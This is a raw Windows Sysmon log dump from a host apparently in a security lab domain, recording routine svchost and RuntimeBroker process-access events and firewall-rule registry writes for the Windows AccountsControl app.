13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.826{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.810{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.810{08A6967A-4753-6000-0D05-000000009A01}11164772C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000010391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.810{08A6967A-4753-6000-0D05-000000009A01}11164772C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 13241300x800000000000000010390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.810{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-9|C=S-1-15-3-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|M=microsoft.accountscontrol_cw5n1h2txyewy|Name=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\|PFN=Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x800000000000000010389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.795{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{96C982DA-653D-4412-9A24-CE45F45B1834}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.795{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{DBCC7012-E501-420F-8210-E4D520900E21}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x800000000000000010387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.795{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D8CD6301-020D-4279-B2E8-8FD84D745AB8}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x800000000000000010386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.795{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{1977D546-B462-4D60-9C21-9FB293E944BF}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 10341000x800000000000000010385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 